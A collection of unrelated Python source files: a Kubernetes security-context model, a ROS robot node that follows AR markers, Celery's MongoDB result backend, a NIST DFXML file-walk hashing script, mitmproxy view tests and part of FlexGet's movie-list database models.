"""
Sets the privileged of this V1SecurityContext.
Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
:param privileged: The privileged of this V1SecurityContext.
:type: bool
"""
self._privileged = privileged
@property
def se_linux_options(self):
"""
Gets the se_linux_options of this V1SecurityContext.
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The se_linux_options of this V1SecurityContext.
:rtype: V1SELinuxOptions
"""
return self._se_linux_options
@se_linux_options.setter
def se_linux_options(self, se_linux_options):
"""
Sets the se_linux_options of this V1SecurityContext.
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param se_linux_options: The se_linux_options of this V1SecurityContext.
:type: V1SELinuxOptions
"""
self._se_linux_options = se_linux_options
@property
def run_as_user(self):
"""
Gets the run_as_user of this V1SecurityContext.
The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The run_as_user of this V1SecurityContext.
:rtype: int
"""
return self._run_as_user
@run_as_user.setter
def run_as_user(self, run_as_user):
"""
Sets the run_as_user of this V1SecurityContext.
The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param run_as_user: The run_as_user of this V1SecurityContext.
:type: int
"""
self._run_as_user = run_as_user
@property
def run_as_non_root(self):
"""
Gets the run_as_non_root of this V1SecurityContext.
Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The run_as_non_root of this V1SecurityContext.
:rtype: bool
"""
return self._run_as_non_root
@run_as_non_root.setter
def run_as_non_root(self, run_as_non_root):
"""
Sets the run_as_non_root of this V1SecurityContext.
Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param run_as_non_root: The run_as_non_root of this V1SecurityContext.
:type: bool
"""
self._run_as_non_root = run_as_non_root
@property
def read_only_root_filesystem(self):
"""
Gets the read_only_root_filesystem of this V1SecurityContext.
Whether this container has a read-only root filesystem. Default is false.
:return: The read_only_root_filesystem of this V1SecurityContext.
:rtype: bool
"""
return self._read_only_root_filesystem
@read_only_root_filesystem.setter
def read_only_root_filesystem(self, read_only_root_filesystem):
"""
Sets the read_only_root_filesystem of this V1SecurityContext.
Whether this container has a read-only root filesystem. Default is false.
:param read_only_root_filesystem: The read_only_root_filesystem of this V1SecurityContext.
:type: bool
"""
self._read_only_root_filesystem = read_only_root_filesystem
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1SecurityContext.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
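# Hedged usage sketch (added for illustration, not part of the generated code):
# the model is a plain data holder, so building a context and serialising it
# back to a dict is assumed to look like this.
def _example_security_context():
    ctx = V1SecurityContext(
        privileged=False,
        run_as_non_root=True,
        run_as_user=1000,
        read_only_root_filesystem=True)
    return ctx.to_dict()   # e.g. {'privileged': False, 'run_as_user': 1000, ...}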
|
|
#!/usr/bin/env python
"""
ar_follower.py - Version 1.0 2013-08-25
Follow an AR tag published on the /ar_pose_marker topic. The /ar_pose_marker topic
is published by the ar_track_alvar package
Created for the Pi Robot Project: http://www.pirobot.org
Copyright (c) 2013 Patrick Goebel. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import actionlib
from actionlib_msgs.msg import *
from ar_track_alvar.msg import AlvarMarkers
from geometry_msgs.msg import Pose, Point, Quaternion, Twist
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from tf.transformations import quaternion_from_euler
from visualization_msgs.msg import Marker
from math import copysign
from math import radians, pi
class ARFollower():
def __init__(self):
rospy.init_node("ar_follower")
# Set the shutdown function (stop the robot)
rospy.on_shutdown(self.shutdown)
# How often should we update the robot's motion?
self.rate = rospy.get_param("~rate", 10)
r = rospy.Rate(self.rate)
# The maximum rotation speed in radians per second
self.max_angular_speed = rospy.get_param("~max_angular_speed", 2.0)
# The minimum rotation speed in radians per second
self.min_angular_speed = rospy.get_param("~min_angular_speed", 0.5)
# The maximum distance a target can be from the robot for us to track
self.max_x = rospy.get_param("~max_x", 20.0)
# The goal distance (in meters) to keep between the robot and the marker
self.goal_x = rospy.get_param("~goal_x", 0.6)
# How far away from the goal distance (in meters) before the robot reacts
self.x_threshold = rospy.get_param("~x_threshold", 0.05)
# How far away from being centered (y displacement) on the AR marker
# before the robot reacts (units are meters)
self.y_threshold = rospy.get_param("~y_threshold", 0.05)
# How much do we weight the goal distance (x) when making a movement
self.x_scale = rospy.get_param("~x_scale", 0.5)
# How much do we weight y-displacement when making a movement
self.y_scale = rospy.get_param("~y_scale", 1.0)
# The max linear speed in meters per second
self.max_linear_speed = rospy.get_param("~max_linear_speed", 0.3)
# The minimum linear speed in meters per second
self.min_linear_speed = rospy.get_param("~min_linear_speed", 0.1)
# Publisher to control the robot's movement
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)
# Initialize the movement command
self.move_cmd = Twist()
# Set flag to indicate when the AR marker is visible
self.target_visible = False
# Wait for the ar_pose_marker topic to become available
rospy.loginfo("Waiting for ar_pose_marker topic...")
rospy.wait_for_message('ar_pose_marker', AlvarMarkers)
# Subscribe to the ar_pose_marker topic to get the image width and height
rospy.Subscriber('ar_pose_marker', AlvarMarkers, self.set_cmd_vel)
rospy.loginfo("Marker messages detected. Starting follower...")
"""
Some modification
"""
self.canFollow = True
self.TakeRight = False
quaternions = list()
euler_angles = (pi/2, pi, 3*pi/2, 0)
for angle in euler_angles:
q_angle = quaternion_from_euler(0, 0, angle, axes='sxyz')
q = Quaternion(*q_angle)
quaternions.append(q)
self.waypoints = list()
self.waypoints.append(Pose(Point(0, 0.0, 0.0), quaternions[0]))
self.waypoints.append(Pose(Point(1, 1, 0.0), quaternions[1]))
self.waypoints.append(Pose(Point(0.0, 1, 0.0), quaternions[2]))
self.waypoints.append(Pose(Point(0.0, 0.0, 0.0), quaternions[3]))
# not using markers
for waypoint in self.waypoints:
p = Point()
p = waypoint.position
self.move_base = actionlib.SimpleActionClient("move_base", MoveBaseAction)
rospy.loginfo("Waiting for move_base action server...")
self.move_base.wait_for_server(rospy.Duration(60))
rospy.loginfo("Connected to move base server")
rospy.loginfo("Starting navigation test")
# Begin the cmd_vel publishing loop
while not rospy.is_shutdown():
# Send the Twist command to the robot
self.cmd_vel_pub.publish(self.move_cmd)
# Sleep for 1/self.rate seconds
r.sleep()
def set_cmd_vel(self, msg):
# Pick off the first marker (in case there is more than one)
try:
marker = msg.markers[0]
if not self.target_visible:
rospy.loginfo("FOLLOWER is Tracking Target!")
self.target_visible = True
except:
# If the target is lost, stop the robot by slowing it incrementally
self.move_cmd.linear.x /= 1.5
self.move_cmd.angular.z /= 1.5
if self.target_visible:
rospy.loginfo("FOLLOWER LOST Target!")
self.target_visible = False
return
# Get the displacement of the marker relative to the base
target_offset_y = marker.pose.pose.position.y
# Get the distance of the marker from the base
target_offset_x = marker.pose.pose.position.x
# Rotate the robot only if the displacement of the target exceeds the threshold
if abs(target_offset_y) > self.y_threshold :
# Set the rotation speed proportional to the displacement of the target
if self.canFollow == True:
speed = target_offset_y * self.y_scale
self.move_cmd.angular.z = copysign(max(self.min_angular_speed, min(self.max_angular_speed, abs(speed))), speed)
else:
self.move_cmd.angular.z = 0.0
# Now get the linear speed
if abs(target_offset_x - self.goal_x) > self.x_threshold:
if self.canFollow == True:
speed = (target_offset_x - self.goal_x) * self.x_scale
if speed < 0:
speed *= 1.5
self.move_cmd.linear.x = copysign(min(self.max_linear_speed, max(self.min_linear_speed, abs(speed))), speed)
else:
self.move_cmd.linear.x = 0.0
self.canFollow = False
self.TakeRight = True
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose = self.waypoints[0]
self.move(goal)
def move(self, goal):
self.move_base.send_goal(goal)
finished_within_time = self.move_base.wait_for_result(rospy.Duration(60))
if not finished_within_time:
self.move_base.cancel_goal()
rospy.loginfo("Timed out achieving goal")
else:
# We made it!
state = self.move_base.get_state()
if state == GoalStatus.SUCCEEDED:
rospy.loginfo("Goal succeeded!")
def shutdown(self):
rospy.loginfo("Stopping the robot...")
self.cmd_vel_pub.publish(Twist())
rospy.sleep(1)
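# Hedged sketch (added for illustration, independent of ROS): both speed
# commands in set_cmd_vel above reduce to scaling the offset and clipping the
# magnitude between the configured min and max speeds while preserving the
# sign. The helper name is hypothetical.
def _clamped_speed(offset, scale, min_speed, max_speed):
    raw = offset * scale
    return copysign(max(min_speed, min(max_speed, abs(raw))), raw)
# e.g. _clamped_speed(0.02, 1.0, 0.5, 2.0) -> 0.5 (clipped up to the minimum speed)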
if __name__ == '__main__':
try:
ARFollower()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("AR follower node terminated.")
|
|
# -*- coding: utf-8 -*-
"""MongoDB backend for celery."""
from __future__ import absolute_import
from datetime import datetime
try:
import pymongo
except ImportError: # pragma: no cover
pymongo = None # noqa
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
from pymongo.binary import Binary # noqa
else: # pragma: no cover
Binary = None # noqa
from kombu.utils import cached_property
from celery import states
from celery.exceptions import ImproperlyConfigured
from celery.utils.timeutils import maybe_timedelta
from .base import BaseDictBackend
class Bunch(object):
def __init__(self, **kw):
self.__dict__.update(kw)
class MongoBackend(BaseDictBackend):
mongodb_host = "localhost"
mongodb_port = 27017
mongodb_user = None
mongodb_password = None
mongodb_database = "celery"
mongodb_taskmeta_collection = "celery_taskmeta"
def __init__(self, *args, **kwargs):
"""Initialize MongoDB backend instance.
:raises celery.exceptions.ImproperlyConfigured: if
module :mod:`pymongo` is not available.
"""
super(MongoBackend, self).__init__(*args, **kwargs)
self.expires = kwargs.get("expires") or maybe_timedelta(
self.app.conf.CELERY_TASK_RESULT_EXPIRES)
if not pymongo:
raise ImproperlyConfigured(
"You need to install the pymongo library to use the "
"MongoDB backend.")
config = self.app.conf.get("CELERY_MONGODB_BACKEND_SETTINGS", None)
if config is not None:
if not isinstance(config, dict):
raise ImproperlyConfigured(
"MongoDB backend settings should be grouped in a dict")
self.mongodb_host = config.get("host", self.mongodb_host)
self.mongodb_port = int(config.get("port", self.mongodb_port))
self.mongodb_user = config.get("user", self.mongodb_user)
self.mongodb_password = config.get(
"password", self.mongodb_password)
self.mongodb_database = config.get(
"database", self.mongodb_database)
self.mongodb_taskmeta_collection = config.get(
"taskmeta_collection", self.mongodb_taskmeta_collection)
self._connection = None
def _get_connection(self):
"""Connect to the MongoDB server."""
if self._connection is None:
from pymongo.connection import Connection
# The first pymongo.Connection() argument (host) can be
# a list of ['host:port'] elements or a mongodb connection
# URI. If this is the case, don't use self.mongodb_port
# but let pymongo get the port(s) from the URI instead.
# This enables the use of replica sets and sharding.
# See pymongo.Connection() for more info.
args = [self.mongodb_host]
if isinstance(self.mongodb_host, basestring) \
and not self.mongodb_host.startswith("mongodb://"):
args.append(self.mongodb_port)
self._connection = Connection(*args)
return self._connection
def process_cleanup(self):
if self._connection is not None:
# MongoDB connection will be closed automatically when object
# goes out of scope
self._connection = None
def _store_result(self, task_id, result, status, traceback=None):
"""Store return value and status of an executed task."""
meta = {"_id": task_id,
"status": status,
"result": Binary(self.encode(result)),
"date_done": datetime.utcnow(),
"traceback": Binary(self.encode(traceback)),
"children": Binary(self.encode(self.current_task_children()))}
self.collection.save(meta, safe=True)
return result
def _get_task_meta_for(self, task_id):
"""Get task metadata for a task by id."""
obj = self.collection.find_one({"_id": task_id})
if not obj:
return {"status": states.PENDING, "result": None}
meta = {
"task_id": obj["_id"],
"status": obj["status"],
"result": self.decode(obj["result"]),
"date_done": obj["date_done"],
"traceback": self.decode(obj["traceback"]),
"children": self.decode(obj["children"]),
}
return meta
def _save_taskset(self, taskset_id, result):
"""Save the taskset result."""
meta = {"_id": taskset_id,
"result": Binary(self.encode(result)),
"date_done": datetime.utcnow()}
self.collection.save(meta, safe=True)
return result
def _restore_taskset(self, taskset_id):
"""Get the result for a taskset by id."""
obj = self.collection.find_one({"_id": taskset_id})
if not obj:
return
meta = {
"task_id": obj["_id"],
"result": self.decode(obj["result"]),
"date_done": obj["date_done"],
}
return meta
def _delete_taskset(self, taskset_id):
"""Delete a taskset by id."""
self.collection.remove({"_id": taskset_id})
def _forget(self, task_id):
"""
Remove result from MongoDB.
:raises celery.exceptions.OperationsError: if the task_id could not be
removed.
"""
# By using safe=True, this will wait until it receives a response from
# the server. Likewise, it will raise an OperationsError if the
# operation could not be completed.
self.collection.remove({"_id": task_id}, safe=True)
def cleanup(self):
"""Delete expired metadata."""
self.collection.remove({
"date_done": {
"$lt": self.app.now() - self.expires,
}
})
def __reduce__(self, args=(), kwargs={}):
kwargs.update(
dict(expires=self.expires))
return super(MongoBackend, self).__reduce__(args, kwargs)
def _get_database(self):
conn = self._get_connection()
db = conn[self.mongodb_database]
if self.mongodb_user and self.mongodb_password:
if not db.authenticate(self.mongodb_user,
self.mongodb_password):
raise ImproperlyConfigured(
"Invalid MongoDB username or password.")
return db
@cached_property
def database(self):
"""Get database from MongoDB connection and perform authentication
if necessary."""
return self._get_database()
@cached_property
def collection(self):
"""Get the metadata task collection."""
collection = self.database[self.mongodb_taskmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.ensure_index('date_done', background='true')
return collection
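# Hedged configuration sketch (added for illustration, not part of this module):
# the backend reads its connection settings from the
# CELERY_MONGODB_BACKEND_SETTINGS dict, so a typical celeryconfig entry is
# assumed to look roughly like this:
#
#     CELERY_RESULT_BACKEND = "mongodb"
#     CELERY_MONGODB_BACKEND_SETTINGS = {
#         "host": "localhost",
#         "port": 27017,
#         "user": None,
#         "password": None,
#         "database": "celery",
#         "taskmeta_collection": "celery_taskmeta",
#     }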
|
|
#!/usr/bin/env python3
# This software was developed at the National Institute of Standards
# and Technology by employees of the Federal Government in the course
# of their official duties. Pursuant to title 17 Section 105 of the
# United States Code this software is not subject to copyright
# protection and is in the public domain. NIST assumes no
# responsibility whatsoever for its use by other parties, and makes
# no guarantees, expressed or implied, about its quality,
# reliability, or any other characteristic.
#
# We would appreciate acknowledgement if the software is used.
"""Walk current directory, writing DFXML to stdout."""
__version__ = "0.3.0"
import os
import stat
import hashlib
import argparse
import traceback
import logging
import sys
_logger = logging.getLogger(os.path.basename(__file__))
import Objects
def filepath_to_fileobject(filepath, args):
fobj = Objects.FileObject()
#Determine type - done in three steps.
if os.path.islink(filepath):
fobj.name_type = "l"
elif os.path.isdir(filepath):
fobj.name_type = "d"
elif os.path.isfile(filepath):
fobj.name_type = "r"
else:
#Need to finish type determinations with stat structure.
pass
#Prime fileobjects from Stat data (lstat for soft links).
if fobj.name_type == "l":
sobj = os.lstat(filepath)
else:
sobj = os.stat(filepath)
#_logger.debug(sobj)
fobj.populate_from_stat(sobj)
if fobj.name_type is None:
if stat.S_ISCHR(fobj.mode):
fobj.name_type = "c"
elif stat.S_ISBLK(fobj.mode):
fobj.name_type = "b"
elif stat.S_ISFIFO(fobj.mode):
fobj.name_type = "p"
elif stat.S_ISSOCK(fobj.mode):
fobj.name_type = "s"
elif stat.S_ISWHT(fobj.mode):
fobj.name_type = "w"
else:
raise NotImplementedError("No reporting check written for file type of %r." % filepath)
#Hard-coded information: Name, and assumed allocation status.
fobj.filename = filepath
fobj.alloc = True
if fobj.name_type == "l":
fobj.link_target = os.readlink(filepath)
if not args.n:
#Add hashes for regular files.
if fobj.name_type == "r":
try:
with open(filepath, "rb") as in_fh:
chunk_size = 2**22
md5obj = hashlib.md5()
sha512obj = hashlib.sha512()
any_error = False
while True:
buf = b""
try:
buf = in_fh.read(chunk_size)
except Exception as e:
any_error = True
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
buf = b""
if buf == b"":
break
md5obj.update(buf)
sha512obj.update(buf)
if not any_error:
fobj.md5 = md5obj.hexdigest()
fobj.sha512 = sha512obj.hexdigest()
except Exception as e:
if fobj.error is None:
fobj.error = ""
else:
fobj.error += "\n"
fobj.error += "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
return fobj
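# Hedged usage sketch (added for illustration): filepath_to_fileobject can also
# be used on a single path outside the full walk in main(); parse_args([])
# (defined below) supplies the default options. The helper name is hypothetical.
def _example_single_path(path="."):
    args = parse_args([])   # defaults: hashing enabled, one worker thread
    fobj = filepath_to_fileobject(path, args)
    return fobj.filename, fobj.name_type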
def main(args_):
#Determine whether we're going in threading mode or not. (Some modules are not available by default.)
args = parse_args(args_)
using_threading = False
if args.jobs > 1:
using_threading = True #(unless supporting modules are absent)
try:
import threading
except:
using_threading = False
_logger.warning("Threading support not available. Running in single thread only.")
try:
import queue
except:
using_threading = False
_logger.warning("Python queue support not available. (If running Ubuntu, this is in package python3-queuelib.) Running in single thread only.")
dobj = Objects.DFXMLObject(version="1.1.1")
dobj.program = sys.argv[0]
dobj.program_version = __version__
dobj.command_line = " ".join(sys.argv)
dobj.dc["type"] = "File system walk"
dobj.add_creator_library("Python", ".".join(map(str, sys.version_info[0:3]))) #A bit of a bend, but gets the major version information out.
dobj.add_creator_library("Objects.py", Objects.__version__)
dobj.add_creator_library("dfxml.py", Objects.dfxml.__version__)
filepaths = set()
filepaths.add(".")
for (dirpath, dirnames, filenames) in os.walk("."):
dirent_names = set()
for dirname in dirnames:
dirent_names.add(dirname)
for filename in filenames:
dirent_names.add(filename)
for dirent_name in sorted(dirent_names):
#The relpath wrapper removes "./" from the head of the path.
filepath = os.path.relpath(os.path.join(dirpath, dirent_name))
filepaths.add(filepath)
fileobjects_by_filepath = dict()
if using_threading:
#Threading syntax c/o: https://docs.python.org/3.5/library/queue.html
q = queue.Queue()
threads = []
def _worker():
while True:
filepath = q.get()
if filepath is None:
break
fobj = filepath_to_fileobject(filepath, args)
fileobjects_by_filepath[filepath] = fobj
q.task_done()
for i in range(args.jobs):
t = threading.Thread(target=_worker)
t.start()
threads.append(t)
for filepath in filepaths:
q.put(filepath)
# block until all tasks are done
q.join()
# stop workers
for i in range(args.jobs):
q.put(None)
for t in threads:
t.join()
else: #Not threading.
for filepath in sorted(filepaths):
fobj = filepath_to_fileobject(filepath, args)
fileobjects_by_filepath[filepath] = fobj
#Build output DFXML tree.
for filepath in sorted(fileobjects_by_filepath.keys()):
dobj.append(fileobjects_by_filepath[filepath])
return dobj.to_dfxml()
def parse_args(args_):
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-n", action="store_true", help="Do not calculate any hashes")
parser.add_argument("-j", "--jobs", type=int, default=1, help="Number of file-processing threads to run.")
args = parser.parse_args(args_)
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.jobs <= 0:
raise ValueError("If requesting multiple jobs, please request 1 or more worker threads.")
return args
if __name__ == "__main__":
print(main(sys.argv[1:]))
|
|
import pytest
from mitmproxy.test import tflow
from mitmproxy.addons import view
from mitmproxy import flowfilter
from mitmproxy import options
from mitmproxy.test import taddons
def tft(*, method="get", start=0):
f = tflow.tflow()
f.request.method = method
f.request.timestamp_start = start
return f
class Options(options.Options):
def __init__(
self,
*,
filter=None,
console_order=None,
console_order_reversed=False,
console_focus_follow=False,
**kwargs
):
self.filter = filter
self.console_order = console_order
self.console_order_reversed = console_order_reversed
self.console_focus_follow = console_focus_follow
super().__init__(**kwargs)
def test_order_refresh():
v = view.View()
sargs = []
def save(*args, **kwargs):
sargs.extend([args, kwargs])
v.sig_view_refresh.connect(save)
tf = tflow.tflow(resp=True)
with taddons.context(options=Options()) as tctx:
tctx.configure(v, console_order="time")
v.add(tf)
tf.request.timestamp_start = 1
assert not sargs
v.update(tf)
assert sargs
def test_order_generators():
v = view.View()
tf = tflow.tflow(resp=True)
rs = view.OrderRequestStart(v)
assert rs.generate(tf) == 0
rm = view.OrderRequestMethod(v)
assert rm.generate(tf) == tf.request.method
ru = view.OrderRequestURL(v)
assert ru.generate(tf) == tf.request.url
sz = view.OrderKeySize(v)
assert sz.generate(tf) == len(tf.request.raw_content) + len(tf.response.raw_content)
def test_simple():
v = view.View()
f = tft(start=1)
assert v.store_count() == 0
v.request(f)
assert list(v) == [f]
assert v.get_by_id(f.id)
assert not v.get_by_id("nonexistent")
# These all just call update
v.error(f)
v.response(f)
v.intercept(f)
v.resume(f)
v.kill(f)
assert list(v) == [f]
v.request(f)
assert list(v) == [f]
assert len(v._store) == 1
assert v.store_count() == 1
f2 = tft(start=3)
v.request(f2)
assert list(v) == [f, f2]
v.request(f2)
assert list(v) == [f, f2]
assert len(v._store) == 2
assert v.inbounds(0)
assert not v.inbounds(-1)
assert not v.inbounds(100)
f3 = tft(start=2)
v.request(f3)
assert list(v) == [f, f3, f2]
v.request(f3)
assert list(v) == [f, f3, f2]
assert len(v._store) == 3
f.marked = not f.marked
f2.marked = not f2.marked
v.clear_not_marked()
assert list(v) == [f, f2]
assert len(v) == 2
assert len(v._store) == 2
v.clear()
assert len(v) == 0
assert len(v._store) == 0
def test_filter():
v = view.View()
f = flowfilter.parse("~m get")
v.request(tft(method="get"))
v.request(tft(method="put"))
v.request(tft(method="get"))
v.request(tft(method="put"))
assert len(v) == 4
v.set_filter(f)
assert [i.request.method for i in v] == ["GET", "GET"]
assert len(v._store) == 4
v.set_filter(None)
assert len(v) == 4
v.toggle_marked()
assert len(v) == 0
v.toggle_marked()
assert len(v) == 4
v[1].marked = True
v.toggle_marked()
assert len(v) == 1
assert v[0].marked
v.toggle_marked()
assert len(v) == 4
def test_order():
v = view.View()
with taddons.context(options=Options()) as tctx:
v.request(tft(method="get", start=1))
v.request(tft(method="put", start=2))
v.request(tft(method="get", start=3))
v.request(tft(method="put", start=4))
assert [i.request.timestamp_start for i in v] == [1, 2, 3, 4]
tctx.configure(v, console_order="method")
assert [i.request.method for i in v] == ["GET", "GET", "PUT", "PUT"]
v.set_reversed(True)
assert [i.request.method for i in v] == ["PUT", "PUT", "GET", "GET"]
tctx.configure(v, console_order="time")
assert [i.request.timestamp_start for i in v] == [4, 3, 2, 1]
v.set_reversed(False)
assert [i.request.timestamp_start for i in v] == [1, 2, 3, 4]
def test_reversed():
v = view.View()
v.request(tft(start=1))
v.request(tft(start=2))
v.request(tft(start=3))
v.set_reversed(True)
assert v[0].request.timestamp_start == 3
assert v[-1].request.timestamp_start == 1
assert v[2].request.timestamp_start == 1
with pytest.raises(IndexError):
v[5]
with pytest.raises(IndexError):
v[-5]
assert v._bisect(v[0]) == 1
assert v._bisect(v[2]) == 3
def test_update():
v = view.View()
flt = flowfilter.parse("~m get")
v.set_filter(flt)
f = tft(method="get")
v.request(f)
assert f in v
f.request.method = "put"
v.update(f)
assert f not in v
f.request.method = "get"
v.update(f)
assert f in v
v.update(f)
assert f in v
class Record:
def __init__(self):
self.calls = []
def __bool__(self):
return bool(self.calls)
def __repr__(self):
return repr(self.calls)
def __call__(self, *args, **kwargs):
self.calls.append((args, kwargs))
def test_signals():
v = view.View()
rec_add = Record()
rec_update = Record()
rec_remove = Record()
rec_refresh = Record()
def clearrec():
rec_add.calls = []
rec_update.calls = []
rec_remove.calls = []
rec_refresh.calls = []
v.sig_view_add.connect(rec_add)
v.sig_view_update.connect(rec_update)
v.sig_view_remove.connect(rec_remove)
v.sig_view_refresh.connect(rec_refresh)
assert not any([rec_add, rec_update, rec_remove, rec_refresh])
# Simple add
v.add(tft())
assert rec_add
assert not any([rec_update, rec_remove, rec_refresh])
# Filter change triggers refresh
clearrec()
v.set_filter(flowfilter.parse("~m put"))
assert rec_refresh
assert not any([rec_update, rec_add, rec_remove])
v.set_filter(flowfilter.parse("~m get"))
# An update that results in a flow being removed from the view
clearrec()
v[0].request.method = "PUT"
v.update(v[0])
assert rec_remove
assert not any([rec_update, rec_refresh, rec_add])
# An update that does not affect the view just sends update
v.set_filter(flowfilter.parse("~m put"))
clearrec()
v.update(v[0])
assert rec_update
assert not any([rec_remove, rec_refresh, rec_add])
# An update for a flow in state but not view does not do anything
f = v[0]
v.set_filter(flowfilter.parse("~m get"))
assert not len(v)
clearrec()
v.update(f)
assert not any([rec_add, rec_update, rec_remove, rec_refresh])
def test_focus_follow():
v = view.View()
with taddons.context(options=Options()) as tctx:
tctx.configure(v, console_focus_follow=True, filter="~m get")
v.add(tft(start=5))
assert v.focus.index == 0
v.add(tft(start=4))
assert v.focus.index == 0
assert v.focus.flow.request.timestamp_start == 4
v.add(tft(start=7))
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 7
mod = tft(method="put", start=6)
v.add(mod)
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 7
mod.request.method = "GET"
v.update(mod)
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 6
def test_focus():
# Special case - initialising with a view that already contains data
v = view.View()
v.add(tft())
f = view.Focus(v)
assert f.index == 0
assert f.flow is v[0]
# Start empty
v = view.View()
f = view.Focus(v)
assert f.index is None
assert f.flow is None
v.add(tft(start=1))
assert f.index == 0
assert f.flow is v[0]
# Try to set to something not in view
with pytest.raises(ValueError):
f.__setattr__("flow", tft())
with pytest.raises(ValueError):
f.__setattr__("index", 99)
v.add(tft(start=0))
assert f.index == 1
assert f.flow is v[1]
v.add(tft(start=2))
assert f.index == 1
assert f.flow is v[1]
f.index = 0
assert f.index == 0
f.index = 1
v.remove(v[1])
assert f.index == 1
assert f.flow is v[1]
v.remove(v[1])
assert f.index == 0
assert f.flow is v[0]
v.remove(v[0])
assert f.index is None
assert f.flow is None
v.add(tft(method="get", start=0))
v.add(tft(method="get", start=1))
v.add(tft(method="put", start=2))
v.add(tft(method="get", start=3))
f.flow = v[2]
assert f.flow.request.method == "PUT"
filt = flowfilter.parse("~m get")
v.set_filter(filt)
assert f.index == 2
filt = flowfilter.parse("~m oink")
v.set_filter(filt)
assert f.index is None
def test_settings():
v = view.View()
f = tft()
with pytest.raises(KeyError):
v.settings[f]
v.add(f)
v.settings[f]["foo"] = "bar"
assert v.settings[f]["foo"] == "bar"
assert len(list(v.settings)) == 1
v.remove(f)
with pytest.raises(KeyError):
v.settings[f]
assert not v.settings.keys()
v.add(f)
v.settings[f]["foo"] = "bar"
assert v.settings.keys()
v.clear()
assert not v.settings.keys()
def test_configure():
v = view.View()
with taddons.context(options=Options()) as tctx:
tctx.configure(v, filter="~q")
with pytest.raises(Exception, match="Invalid interception filter"):
tctx.configure(v, filter="~~")
tctx.configure(v, console_order="method")
with pytest.raises(Exception, match="Unknown flow order"):
tctx.configure(v, console_order="no")
tctx.configure(v, console_order_reversed=True)
tctx.configure(v, console_order=None)
tctx.configure(v, console_focus_follow=True)
assert v.focus_follow
|
|
from __future__ import unicode_literals, division, absolute_import
import logging
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from collections import MutableSet
from datetime import datetime
from sqlalchemy import Column, Unicode, Integer, ForeignKey, func, DateTime
from sqlalchemy.orm import relationship
from sqlalchemy.sql.elements import and_
from flexget import plugin
from flexget.db_schema import versioned_base, with_session
from flexget.entry import Entry
from flexget.event import event
from flexget.manager import Session
from flexget.plugin import get_plugin_by_name
from flexget.plugins.parsers.parser_common import normalize_name, remove_dirt
from flexget.utils.tools import split_title_year
log = logging.getLogger('movie_list')
Base = versioned_base('movie_list', 0)
class MovieListBase(object):
"""
Class that contains helper methods for movie list as well as plugins that use it,
such as API and CLI.
"""
@property
def supported_ids(self):
# Return a list of supported movie identifiers as registered via their plugins
return [p.instance.movie_identifier for p in plugin.get_plugins(group='movie_metainfo')]
class MovieListList(Base):
__tablename__ = 'movie_list_lists'
id = Column(Integer, primary_key=True)
name = Column(Unicode, unique=True)
added = Column(DateTime, default=datetime.now)
movies = relationship('MovieListMovie', backref='list', cascade='all, delete, delete-orphan', lazy='dynamic')
def __repr__(self):
return '<MovieListList name={},id={}>'.format(self.name, self.id)
def to_dict(self):
return {
'id': self.id,
'name': self.name,
'added_on': self.added
}
class MovieListMovie(Base):
__tablename__ = 'movie_list_movies'
id = Column(Integer, primary_key=True)
added = Column(DateTime, default=datetime.now)
title = Column(Unicode)
year = Column(Integer)
